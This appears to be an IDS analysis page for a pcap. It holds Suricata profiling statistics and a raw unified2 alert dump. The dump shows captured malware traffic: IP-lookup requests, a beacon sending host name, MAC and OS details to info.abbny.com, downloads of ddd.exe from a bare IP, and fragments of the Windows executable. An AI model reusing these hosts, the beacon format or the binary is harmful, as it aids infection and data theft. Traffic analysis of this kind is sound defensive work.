Filename: network.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etpro-all
Runtime: 23.5041158199 seconds
Hash: cfcab331f081527fd30a5330ac5c8df5
Uploaded: 1554298797

Logfiles


packet_stats.log - (17744 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       1             3       2761037516     2782194735    2775111423          8.3b    0.02
 IPv4       6         16826          1261167     3027276170    2300010933      38700.0b   99.90
 IPv4      17            51         10229331     2745297864     613694297         31.3b    0.08
 IPv6      17            17         10522313       55824799      22871542        388.8m    0.00
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       1             3            98167         118513        107755        323.3k    0.01
TMM_FLOWWORKER              IPv4       6         16826            66048       15865086        218247          3.7b   96.54
TMM_FLOWWORKER              IPv4      17            51           152153       10269554        527180         26.9m    0.71
TMM_RECEIVEPCAPFILE         IPv4       1             3             2588           2791          2717          8.2k    0.00
TMM_RECEIVEPCAPFILE         IPv4       6         16825             2528         116639          2778         46.8m    1.23
TMM_RECEIVEPCAPFILE         IPv4      17            51             2553          11192          3101        158.2k    0.00
TMM_DECODEPCAPFILE          IPv4       1             3             2951          13175          6743         20.2k    0.00
TMM_DECODEPCAPFILE          IPv4       6         16825             2645        4260444          3196         53.8m    1.41
TMM_DECODEPCAPFILE          IPv4      17            51             2682          29705          3506        178.8k    0.00
TMM_FLOWWORKER              IPv6      17            17           173696         315095        198378          3.4m    0.09
TMM_RECEIVEPCAPFILE         IPv6      17            17             2839           3632          3036         51.6k    0.00
TMM_DECODEPCAPFILE          IPv6      17            17             2691          15264          3477         59.1k    0.00

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       1             1             4294           4294          4294          4.3k  0.00  
flow                    IPv4       6         16825             2810         382073          4036         67.9m  1.98  
flow                    IPv4      17            51             2660          23280          4389        223.9k  0.01  
stream                  IPv4       6         16826             2582         721350          4214         70.9m  2.06  
app-layer               IPv4      17            51             2521          42330         10030        511.6k  0.01  
detect                  IPv4       1             3            85117         112374         99578        298.7k  0.01  
detect                  IPv4       6         16826            44592       15831359        191498          3.2b  93.75 
detect                  IPv4      17            51           135885       10080007        474260         24.2m  0.70  
tcp-prune               IPv4       6         16826             2511         450532          2828         47.6m  1.38  
flow                    IPv6      17            17             2671           9572          3431         58.3k  0.00  
app-layer               IPv6      17            17             2559           9633          3858         65.6k  0.00  
detect                  IPv6      17            17           156789         290164        180110          3.1m  0.09  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            11             3724          40147         14634        161.0k  58.13 
http                    IPv4      17             2             4454           6319          5386         10.8k  3.89  
tls                     IPv4       6             2             2801           6432          4616          9.2k  3.33  
dns                     IPv4      17            16             3494          17839          5995         95.9k  34.64 
Proto detect            IPv4       6             1            18305          18305         18305         18.3k
Proto detect            IPv4      17            24             3172          29787          7821        187.7k
Proto detect            IPv6      17             3             2761           3827          3338         10.0k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            13            10840         102604         47695        620.0k  10.72 
LOGGER_UNIFIED2             IPv4       6            13            17127         121672         46985        610.8k  10.56 
LOGGER_JSON_ALERT           IPv4       6            13            30700         131776         72564        943.3k  16.31 
LOGGER_JSON_DNS             IPv4      17            16            27443         446176         81039          1.3m  22.42 
LOGGER_JSON_HTTP            IPv4       6            14            39700         221667         64710        905.9k  15.67 
LOGGER_JSON_TLS             IPv4       6             1            80134          80134         80134         80.1k  1.39  
LOGGER_JSON_FILE            IPv4       6            14            49814         181896         94678          1.3m  22.92 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       1             3             3920          12213          8983        27.0k  0.01  
payload                           IPv4       6          1832             2587        1315917         27211        49.9m  10.65 
payload                           IPv4      17            51             5377        9684951        229978        11.7m  2.51  
stream                            IPv4       6          1832             2538        5874687         55391       101.5m  21.68 
http_uri                          IPv4       6            14             3966         107868         25143       352.0k  0.08  
http_request_line                 IPv4       6            14             3415          10852          6518        91.3k  0.02  
http_client_body                  IPv4       6            14             2811         114943         32388       453.4k  0.10  
http_header (request)             IPv4       6            14             8498          96452         38596       540.3k  0.12  
http_header (request trailer)     IPv4       6            14             2577           2707          2629        36.8k  0.01  
http_header_names (request)       IPv4       6            14             5181          58990         18243       255.4k  0.05  
http_accept (request)             IPv4       6            14             3022          10716          4034        56.5k  0.01  
http_referer (request)            IPv4       6            14             2858           4107          3200        44.8k  0.01  
http_content_len (request)        IPv4       6            14             2912           5240          3698        51.8k  0.01  
http_content_type (request)       IPv4       6            14             2844           6791          3979        55.7k  0.01  
http_protocol (request)           IPv4       6            14             2922           5565          4446        62.3k  0.01  
http_start (request)              IPv4       6            14             5281          22242         11471       160.6k  0.03  
http_raw_header (request)         IPv4       6            14             7114          25698         12616       176.6k  0.04  
http_method                       IPv4       6            14             3026           6793          5255        73.6k  0.02  
http_cookie (request)             IPv4       6            14             2875           3721          3262        45.7k  0.01  
http_raw_uri                      IPv4       6            14             3132           7139          5062        70.9k  0.02  
http_user_agent                   IPv4       6            14             2921          12821          6651        93.1k  0.02  
http_host                         IPv4       6            14             3114           7040          4834        67.7k  0.01  
dns_query                         IPv4      17             8             5561          17641          9346        74.8k  0.02  
tls_sni                           IPv4       6             1             3474           3474          3474         3.5k  0.00  
http_response_line                IPv4       6            14             3187          14682          7708       107.9k  0.02  
http_header (response)            IPv4       6            14             6730          40623         29218       409.1k  0.09  
http_header (response trailer)    IPv4       6            14             2603           3546          2787        39.0k  0.01  
http_content_type (response)      IPv4       6            14             3234          11083          6763        94.7k  0.02  
http_raw_header (response)        IPv4       6          1771             4030         360692          4860         8.6m  1.84  
http_cookie (response)            IPv4       6            14             2861           3653          3124        43.7k  0.01  
http_stat_code                    IPv4       6            14             2787           4730          3800        53.2k  0.01  
tls_cert_issuer                   IPv4       6             1             7489           7489          7489         7.5k  0.00  
tls_cert_subject                  IPv4       6             1             9709           9709          9709         9.7k  0.00  
tls_cert_serial                   IPv4       6             1             5157           5157          5157         5.2k  0.00  
file_data (http response)         IPv4       6          1757             2559       13668297        166596       292.7m  62.52 
Total                             IPv4                  7594                                         61619       467.9m
payload                           IPv6      17            17            10183          29995         13497       229.5k  0.05  
Total                             IPv6                    17                                         13497       229.5k

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       1             3             3664          45309         30269         90.8k  0.00  
PROF_DETECT_IPONLY          IPv4       6         13026             3175        5382111         39987        520.9m  15.02 
PROF_DETECT_IPONLY          IPv4      17            26             5883         205712         43648          1.1m  0.03  
PROF_DETECT_RULES           IPv4       1             3             2547           2570          2561          7.7k  0.00  
PROF_DETECT_RULES           IPv4       6         16826             2525        9388734         62058          1.0b  30.10 
PROF_DETECT_RULES           IPv4      17            51            74845         438266        146906          7.5m  0.22  
PROF_DETECT_STATEFUL_START    IPv4       6          1743             5111        5877393         73850        128.7m  3.71  
PROF_DETECT_STATEFUL_CONT    IPv4       1             3             2702           2779          2743          8.2k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       6         16826             2501        6332014          6779        114.1m  3.29  
PROF_DETECT_STATEFUL_CONT    IPv4      17            51             2511          42135          5012        255.6k  0.01  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          2867             2560        7676804          7512         21.5m  0.62  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            16             2641           4817          2997         48.0k  0.00  
PROF_DETECT_PREFILTER       IPv4       1             3            19551          28088         24753         74.3k  0.00  
PROF_DETECT_PREFILTER       IPv4       6         16826             7697       13836737         40240        677.1m  19.52 
PROF_DETECT_PREFILTER       IPv4      17            51            26362        9721033        257826         13.1m  0.38  
PROF_DETECT_PF_PAYLOAD      IPv4       1             3             8964          17577         14240         42.7k  0.00  
PROF_DETECT_PF_PAYLOAD      IPv4       6          1832            13271        6185577         94421        173.0m  4.99  
PROF_DETECT_PF_PAYLOAD      IPv4      17            51            10633        9690746        235838         12.0m  0.35  
PROF_DETECT_PF_TX           IPv4       6          2867             2558       13682869        113208        324.6m  9.36  
PROF_DETECT_PF_TX           IPv4      17             8            10972          24274         15153        121.2k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6          1307             2525         335605          4049          5.3m  0.15  
PROF_DETECT_PF_SORT1        IPv4      17            51             2929           6095          3891        198.5k  0.01  
PROF_DETECT_PF_SORT2        IPv4       1             3             2542           2547          2544          7.6k  0.00  
PROF_DETECT_PF_SORT2        IPv4       6         16826             2512         384393          2891         48.7m  1.40  
PROF_DETECT_PF_SORT2        IPv4      17            51             2560          22617          4029        205.5k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       1             3             2736           2817          2781          8.3k  0.00  
PROF_DETECT_NONMPMLIST      IPv4       6         16826             2527         288311          3010         50.6m  1.46  
PROF_DETECT_NONMPMLIST      IPv4      17            51             2522           7920          3121        159.2k  0.00  
PROF_DETECT_ALERT           IPv4       1             3             2573           2816          2674          8.0k  0.00  
PROF_DETECT_ALERT           IPv4       6         16826             2518        9702013         10761        181.1m  5.22  
PROF_DETECT_ALERT           IPv4      17            51             2525          16709          2947        150.3k  0.00  
PROF_DETECT_CLEANUP         IPv4       1             3             2516           2796          2648          7.9k  0.00  
PROF_DETECT_CLEANUP         IPv4       6         16826             2546         102138          3019         50.8m  1.46  
PROF_DETECT_CLEANUP         IPv4      17            51             2521           5416          3079        157.0k  0.00  
PROF_DETECT_GETSGH          IPv4       1             3             2772           2827          2803          8.4k  0.00  
PROF_DETECT_GETSGH          IPv4       6         16826             2523         385295          5327         89.6m  2.58  
PROF_DETECT_GETSGH          IPv4      17            51             2516          44139          6668        340.1k  0

This file has been truncated. Go here to download in full.


unified2.alert.1554298818 - (13067 bytes) - download
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
4\ê.ìÂ*ä²!À¨ðOb‘*ÁPÄ\ê.\ê.ì¨Eš)À¨ðOb‘*ÁPP_GET /raw HTTP/1.1
Accept-Encoding: identity
Host: ip.42.pl
Connection: close
User-Agent: Python-urllib/2.7

4\ê.ì·gÀ¨ðOb‘*ÁPÄ\ê.\ê.ì¨Eš)À¨ðOb‘*ÁPP_GET /raw HTTP/1.1
Accept-Encoding: identity
Host: ip.42.pl
Connection: close
User-Agent: Python-urllib/2.7

4\ê0&Õ·gÀ¨ð-OMÁPÃ\ê0\ê0&Õ§E™CÀ¨ð-OMÁPP±GET / HTTP/1.1
Accept-Encoding: identity
Host: jsonip.com
Connection: close
User-Agent: Python-urllib/2.7

4\ê0
­…·gÀ¨ð™\1ÁP~\ê0\ê0
­…bETk^À¨ð™\1ÁPPã{GET /e.png?id=HAPUBWS-PC&mac=0A-00-27-9A-BA-7D,00-01-00-01-23-E2&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-29,11:50:40&c=1&VER=9&d=0&from=ipc&mpass=&size=6967023&num=0&sa=&dig=0&mdl=0 HTTP/1.1
Accept-Encoding: identity
Host: info.abbny.com
Connection: close
User-Agent: Python-urllib/2.7

~\ê0\ê0
­…bETk^À¨ð™\1ÁPPã{GET /e.png?id=HAPUBWS-PC&mac=0A-00-27-9A-BA-7D,00-01-00-01-23-E2&OS=Windows-7-6.1.7601-SP1&BIT=32bit&IT=2019-03-29,11:50:40&c=1&VER=9&d=0&from=ipc&mpass=&size=6967023&num=0&sa=&dig=0&mdl=0 HTTP/1.1
Accept-Encoding: identity
Host: info.abbny.com
Connection: close
User-Agent: Python-urllib/2.7

4\ê1}ÍÀ¨ðf‚~ÁPÎ\ê1\ê1}²E¤k·À¨ðf‚~ÁPPßáGET /ddd.exe HTTP/1.1
Accept-Encoding: identity
Host: 27.102.130.126
Connection: close
User-Agent: Python-urllib/2.7

4\ê1}·gÀ¨ðf‚~ÁPÎ\ê1\ê1}²E¤k·À¨ðf‚~ÁPPßáGET /ddd.exe HTTP/1.1
Accept-Encoding: identity
Host: 27.102.130.126
Connection: close
User-Agent: Python-urllib/2.7

4\ê1}т
À¨ðf‚~ÁPÎ\ê1\ê1}²E¤k·À¨ðf‚~ÁPPßáGET /ddd.exe HTTP/1.1
Accept-Encoding: identity
Host: 27.102.130.126
Connection: close
User-Agent: Python-urllib/2.7

4\ê1lùΏ!f‚~À¨ðPÁ\ê1\ê1lùêEÜff‚~À¨ðPÁPw–üƒÁ#+òFüƒøwN‹òQVè„	‹EôƒÄ‰‹Ç_^[‹å]ÂVWPè*Sÿuÿuè‹EøƒÄƋEô‰‹Ç_^[‹å]Âè0þÿÿè„@ÌÌÌÌÌÌÌÌÌÌÌU‹ìQSV‹ñW‹}‹N‰Mü;ùw(‹Þƒùr‹Wÿu‰~SèDƒÄÆ;‹Æ_^[‹å]ÿÿÿÿ‡œ‹ßƒËûÿÿÿv»ÿÿÿë‹Ñ¸ÿÿÿÑê+Â;Èv»ÿÿÿë
;ØB؍C‹ÎPè¹ýÿÿWÿu‰^‹ØS‰E‰~èT‹EüƒÄÆ;ƒør)H‹ùr‹PüƒÁ#+ƒÀüƒøw‹ÂQPè^ƒÄ_‰‹Æ^[‹å]Âè“?è5ýÿÿÌÌÌÌÌU‹ììP¡T@3ʼnEüS‹]VWh@h,@ÿ(ÀA‹=,ÀAPÿ׋5<ÀA…Àt°þÿÿQÿÐë	…°þÿÿPÿÖf‹…°þÿÿfƒø	t
fƒø…h8@hP@ÿHÀAPÿ׍ÔþÿÿQØþÿÿQÜþÿÿQÿЋ…Üþÿÿƒøuƒ½Øþÿÿuhd@jeëPƒø
u	ƒ½Øþÿÿt2…°þÿÿPÿ֍…àþÿÿDžàþÿÿPÿ ÀA…Àtƒ½äþÿÿÀƒÀt	hd@jeëhd@jdjÿLÀA‹ð…öuhl@èêƒÄ_^[‹Mü3Íè'‹å]ÃVjÿ0ÀAPÿ4ÀAVj‹øÿ8ÀAjjjjjh@S‹ðÿpÀAjÔþÿÿ‰…ÜþÿÿQVWPÿlÀA…Àuh@è}ƒÄëÿµÜþÿÿÿhÀAjSÿ@ÀA‹Mü_^3Í[裋å]ÃÌÌU‹ìjÿhñžAd¡Pƒì`¡T@3ʼnEðVWPEôd£‹uM¸‰u”ÇE˜jh@ÇEüÇEÈÇEÌÆE¸èýÿÿjÇF‹ÎÇFh@ÇEüÆèÛüÿÿEœÇE˜PEÐÇEœ PÿTÀAÿuœEÐPE Pèÿõÿÿ‹øƒÄE¸;Çt)‹Èè<õÿÿE¸ó~GÇGÇGfÖEÈÆ‹U´ƒúr,‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡RQèxƒÄ‹EȅÀ„¨ÇE°ÇE´ÆE ƒø‚íƒÀþ¹;ÁBȃ}̍E¸CE¸QƒÀM PèûûÿÿE ÇE˜;ðt!‹Îè†ôÿÿE jhŒ@ó~E°fÖFë@‹U´ƒúr(‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQè΃ÄjhŒ@ëj
h”@‹Îè%úÿÿ‹Ũúr(‹M¸B‹Áúr‹IüƒÂ#+ÁƒÀüƒøw6RQ臃ċƋMôd‰
Y_^‹Mð3Íèy‹å]Ãè¬;è^ùÿÿè¢;è;ÌÌÌÌU‹ìƒìh¡T@3ʼnEü(€@SVW‹}E¼ÇEìMNOP(À@E̍wÇEðQRST(@@VEÜÇEôUVWXfÇEøYZÆEúè8YV‹ØjS‰]˜\ê1\ê1lùêEÜff‚~À¨ðPÁP÷F裃ÄÿÀAPèGYWÀÇE´ƒÄfÖE¬3öfÇE¸Eœ…ÿ~^>èüX3Ò÷óŠD¼ˆD5œF;÷|ê‹]˜WEœPSèKƒÄj
ÿdÀA‹Mü‹Ã_^3Í[è~‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌ̸°AÃÌÌÌÌÌÌÌÌÌÌU‹ìjÿh+ŸAd¡P¸,èU¡T@3ʼnEðPEôd£h…àïÿÿÇEàapPEàÇEäpdPÇEèatÇEìaÿ|ÀA…àïÿÿPÿtÀA…ÈïÿÿPèFüÿÿÇEüèªôÿÿƒ½Üïÿÿ…ÈïÿÿC…ÈïÿÿPèpúÿÿƒÄh`êÿdÀA‹•Üïÿÿƒúr+‹ÈïÿÿB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw%RQènƒÄ3À‹Môd‰
Y‹Mð3Íèb‹å]Ãè•9ÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ujè“:ƒÄMQjVPèÂþÿÿÿpÿ0è¿VƒÄ^]ÃÌÌU‹ìEPjÿujÿÿuèšþÿÿ‹ÿpƒÉQè
WƒÉÿƒÄ…ÀHÁ]ÃU‹ìVÿu‹ñè%Çô@‹Æ^]ƒa‹ÁƒaÇAü@Çô@ÃU‹ìV‹ñFÇÔ@ƒ ƒ`P‹EƒÀPè£YY‹Æ^]ÂU‹ìQQ‹EV‹ñ‰EøEøÆEüVÇÔ@ƒ"ƒbRPènYY‹Æ^ÉÂU‹ìVÿu‹ñè‘ÿÿÿÇ@‹Æ^]ÂU‹ìQVÿu‹ñ‰uüèžÿÿÿÇ@‹Æ^ÉÂU‹ìVÿu‹ñèWÿÿÿÇ@‹Æ^]ÂU‹ìVÿu‹ñè<ÿÿÿÇ(@‹Æ^]ÂU‹ìQVÿu‹ñ‰uüèIÿÿÿÇ(@‹Æ^ɍAÇÔ@Pè*YÃU‹ìV‹ñFÇÔ@PèöEYt
jVè†YY‹Æ^]ÂU‹ìƒìMôÿuè=ÿÿÿh˜ AEôPèûÌU‹ìƒìMôÿuèrÿÿÿhÔ AEôPèÛ̋A…Àu¸Ü@ÃU‹ìë
ÿuè½UY…Àtÿuè^UY…Àtæ]Ã}ÿ„éõU‹ìÿuè$Y]Ã;
T@òuòÃòé=ÌÌQL$+ÈÀ÷Ð#ȋÄ%ðÿÿ;Èòr‹ÁY”‹‰$òÃ-…ëçVjèSWè3Pèaèjb‹ðèj‰è«ƒÄ^„ÀtsÛâè2	hr@èKèöPè¶ZYY…ÀuQèïè>…ÀthŽ@è•WYèèèÛèºPèfaYèÇ„ÀtèF]è è.…ÀuÃjèÌèÍ3ÀÃè\è|PèaYÃjh¡AèòjèÂY„À„P2ۈ]çƒeüèyˆEÜ¡,³A3ÉA;Á„/…ÀuI‰
,³Ah$@h@è ]YY…ÀtÇEüþÿÿÿ¸ÿéïh@h@èž\YYÇ,³AëŠÙˆ]çÿuÜè°YèD‹ð3ÿ9>tVèY„Àt‹6WjW‹Îÿ4	\ê1lùÖÔf‚~À¨ðPÁ	\ê1\ê1lùêEÜff‚~À¨ðPÁPw–üƒÁ#+òFüƒøwN‹òQVè„	‹EôƒÄ‰‹Ç_^[‹å]ÂVWPè*Sÿuÿuè‹EøƒÄƋEô‰‹Ç_^[‹å]Âè0þÿÿè„@ÌÌÌÌÌÌÌÌÌÌÌU‹ìQSV‹ñW‹}‹N‰Mü;ùw(‹Þƒùr‹Wÿu‰~SèDƒÄÆ;‹Æ_^[‹å]ÿÿÿÿ‡œ‹ßƒËûÿÿÿv»ÿÿÿë‹Ñ¸ÿÿÿÑê+Â;Èv»ÿÿÿë
;ØB؍C‹ÎPè¹ýÿÿWÿu‰^‹ØS‰E‰~èT‹EüƒÄÆ;ƒør)H‹ùr‹PüƒÁ#+ƒÀüƒøw‹ÂQPè^ƒÄ_‰‹Æ^[‹å]Âè“?è5ýÿÿÌÌÌÌÌU‹ììP¡T@3ʼnEüS‹]VWh@h,@ÿ(ÀA‹=,ÀAPÿ׋5<ÀA…Àt°þÿÿQÿÐë	…°þÿÿPÿÖf‹…°þÿÿfƒø	t
fƒø…h8@hP@ÿHÀAPÿ׍ÔþÿÿQØþÿÿQÜþÿÿQÿЋ…Üþÿÿƒøuƒ½Øþÿÿuhd@jeëPƒø
u	ƒ½Øþÿÿt2…°þÿÿPÿ֍…àþÿÿDžàþÿÿPÿ ÀA…Àtƒ½äþÿÿÀƒÀt	hd@jeëhd@jdjÿLÀA‹ð…öuhl@èêƒÄ_^[‹Mü3Íè'‹å]ÃVjÿ0ÀAPÿ4ÀAVj‹øÿ8ÀAjjjjjh@S‹ðÿpÀAjÔþÿÿ‰…ÜþÿÿQVWPÿlÀA…Àuh@è}ƒÄëÿµÜþÿÿÿhÀAjSÿ@ÀA‹Mü_^3Í[裋å]ÃÌÌU‹ìjÿhñžAd¡Pƒì`¡T@3ʼnEðVWPEôd£‹uM¸‰u”ÇE˜jh@ÇEüÇEÈÇEÌÆE¸èýÿÿjÇF‹ÎÇFh@ÇEüÆèÛüÿÿEœÇE˜PEÐÇEœ PÿTÀAÿuœEÐPE Pèÿõÿÿ‹øƒÄE¸;Çt)‹Èè<õÿÿE¸ó~GÇGÇGfÖEÈÆ‹U´ƒúr,‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡RQèxƒÄ‹EȅÀ„¨ÇE°ÇE´ÆE ƒø‚íƒÀþ¹;ÁBȃ}̍E¸CE¸QƒÀM PèûûÿÿE ÇE˜;ðt!‹Îè†ôÿÿE jhŒ@ó~E°fÖFë@‹U´ƒúr(‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQè΃ÄjhŒ@ëj
h”@‹Îè%úÿÿ‹Ũúr(‹M¸B‹Áúr‹IüƒÂ#+ÁƒÀüƒøw6RQ臃ċƋMôd‰
Y_^‹Mð3Íèy‹å]Ãè¬;è^ùÿÿè¢;è;ÌÌÌÌU‹ìƒìh¡T@3ʼnEü(€@SVW‹}E¼ÇEìMNOP(À@E̍wÇEðQRST(@@VEÜÇEôUVWXfÇEøYZÆEúè8YV‹ØjS‰]˜	\ê1\ê1lùêEÜff‚~À¨ðPÁP÷F裃ÄÿÀAPèGYWÀÇE´ƒÄfÖE¬3öfÇE¸Eœ…ÿ~^>èüX3Ò÷óŠD¼ˆD5œF;÷|ê‹]˜WEœPSèKƒÄj
ÿdÀA‹Mü‹Ã_^3Í[è~‹å]ÃÌÌÌÌÌÌÌÌÌÌÌÌ̸°AÃÌÌÌÌÌÌÌÌÌÌU‹ìjÿh+ŸAd¡P¸,èU¡T@3ʼnEðPEôd£h…àïÿÿÇEàapPEàÇEäpdPÇEèatÇEìaÿ|ÀA…àïÿÿPÿtÀA…ÈïÿÿPèFüÿÿÇEüèªôÿÿƒ½Üïÿÿ…ÈïÿÿC…ÈïÿÿPèpúÿÿƒÄh`êÿdÀA‹•Üïÿÿƒúr+‹ÈïÿÿB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw%RQènƒÄ3À‹Môd‰
Y‹Mð3Íèb‹å]Ãè•9ÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ujè“:ƒÄMQjVPèÂþÿÿÿpÿ0è¿VƒÄ^]ÃÌÌU‹ìEPjÿujÿÿuèšþÿÿ‹ÿpƒÉQè
WƒÉÿƒÄ…ÀHÁ]ÃU‹ìVÿu‹ñè%Çô@‹Æ^]ƒa‹ÁƒaÇAü@Çô@ÃU‹ìV‹ñFÇÔ@ƒ ƒ`P‹EƒÀPè£YY‹Æ^]ÂU‹ìQQ‹EV‹ñ‰EøEøÆEüVÇÔ@ƒ"ƒbRPènYY‹Æ^ÉÂU‹ìVÿu‹ñè‘ÿÿÿÇ@‹Æ^]ÂU‹ìQVÿu‹ñ‰uüèžÿÿÿÇ@‹Æ^ÉÂU‹ìVÿu‹ñèWÿÿÿÇ@‹Æ^]ÂU‹ìVÿu‹ñè<ÿÿÿÇ(@‹Æ^]ÂU‹ìQVÿu‹ñ‰uüèIÿÿÿÇ(@‹Æ^ɍAÇÔ@Pè*YÃU‹ìV‹ñFÇÔ@PèöEYt
jVè†YY‹Æ^]ÂU‹ìƒìMôÿuè=ÿÿÿh˜ AEôPèûÌU‹ìƒìMôÿuèrÿÿÿhÔ AEôPèÛ̋A…Àu¸Ü@ÃU‹ìë
ÿuè½UY…Àtÿuè^UY…Àtæ]Ã}ÿ„éõU‹ìÿuè$Y]Ã;
T@òuòÃòé=ÌÌQL$+ÈÀ÷Ð#ȋÄ%ðÿÿ;Èòr‹ÁY”‹‰$òÃ-…ëçVjèSWè3Pèaèjb‹ðèj‰è«ƒÄ^„ÀtsÛâè2	hr@èKèöPè¶ZYY…ÀuQèïè>…ÀthŽ@è•WYèèèÛèºPèfaYèÇ„ÀtèF]è è.…ÀuÃjèÌèÍ3ÀÃè\è|PèaYÃjh¡AèòjèÂY„À„P2ۈ]çƒeüèyˆEÜ¡,³A3ÉA;Á„/…ÀuI‰
,³Ah$@h@è ]YY…ÀtÇEüþÿÿÿ¸ÿéïh@h@èž\YYÇ,³AëŠÙˆ]çÿuÜè°YèD‹ð3ÿ9>tVèY„Àt‹6WjW‹Îÿ4
\ê.‡B¯7À¨ðÀ¨Â™^
\ê.\ê.‡BB^
'šº}E4@€kBÀ¨ðÀ¨Â™˜Vjy€ -´4\ê1	Õk¯7À¨ðÀ¨Â™^\ê1\ê1	ÕkB^
'šº}E4 @€k@À¨ðÀ¨Â™i~—€ ¤å´4\ê1	ÖC¯7À¨ðÀ¨Â™^\ê1\ê1	ÖCB^
'šº}E4!@€k;À¨ðÀ¨Â™É ©.€ £¦´4
\ê.ˆ¯7À¨ðÀ¨Â™^
\ê.\ê.ˆB^
'šº}E4"@€k;À¨ðÀ¨Â™µüu˜€ ê`´4\ê.ˆ%¯7À¨ðÀ¨Â™^\ê.\ê.ˆ%B^
'šº}E4#@€k<À¨ðÀ¨Â™ôð>º€ âK´4\ê1
…RŠ¯À¨ðÀ¨4Â7™^\ê1\ê1
…RB^
'šº}E4F@€jèÀ¨ðÀ¨4Â7™é›
‚€ !Œ´4\ê2÷Âf‚~À¨ðPÁ\ê2\ê2÷êEÜff‚~À¨ðPÁP¯ameWKERNEL32.dllòSHGetSpecialFolderPathASHELL32.dllÁCryptAcquireContextWÛCryptReleaseContextÔCryptGetHashParamÃCryptCreateHashØCryptHashDataÆCryptDestroyHashADVAPI32.dll@StrRChrASHLWAPI.dll‚UnhandledExceptionFilterCSetUnhandledExceptionFilter	GetCurrentProcessaTerminateProcessmIsProcessorFeaturePresent-QueryPerformanceCounter
GetCurrentProcessIdGetCurrentThreadIdÖGetSystemTimeAsFileTimeKInitializeSListHeadgIsDebuggerPresent¾GetStartupInfoWgGetModuleHandleW­RtlUnwind@RaiseExceptionPGetLastErrorSetLastError!EncodePointer%EnterCriticalSection¢LeaveCriticalSectionDeleteCriticalSectionHInitializeCriticalSectionAndSpinCountsTlsAllocuTlsGetValuevTlsSetValuetTlsFreežFreeLibrary§LoadLibraryExWÀGetStdHandleÑMultiByteToWideCharÍWideCharToMultiByteQExitProcessfGetModuleHandleExWÈGetCommandLineAÉGetCommandLineW¤GetACP/HeapAlloc3HeapFree“CompareStringW–LCMapStringW>GetFileTypehFindClosemFindFirstFileExA}FindNextFileArIsValidCodePage†GetOEMCP³GetCPInfo'GetEnvironmentStringsWFreeEnvironmentStringsWíSetEnvironmentVariableA"SetStdHandleÅGetStringTypeW¢GetProcessHeap’FlushFileBuffersÜGetConsoleCPîGetConsoleMode8HeapSize6HeapReAllocýSetFilePointerExàWriteConsoleWÂCreateFileWþDecodePointer\ê2\ê2÷êEÜff‚~À¨ðPÁPòšЀ €@€dX€ep€ˆ€	 	°	Ààи"˜ó¸ÞPÒ&}ZIPMZÿÿ¸@º´	Í!¸LÍ!This program cannot be run in DOS mode.

$»ÿޛÿž°Èÿž°Èÿž°ÈKAÈõž°ÈKCȂž°ÈKBÈ瞰ȭö´Éȭö³ÉힰȭöµÉҞ°È"a{Èúž°Èÿž±ÈŒž°Èn÷´Éýž°Èn÷µÉýž°Èn÷OÈþž°Èÿž'Èþž°Èn÷²Éþž°ÈRichÿž°ÈPEL é\à>Ò	+˜P@@“a@Pa<p0·	¸0À€b b@`L.data$<> à.bss 
P€À.idataŠ`
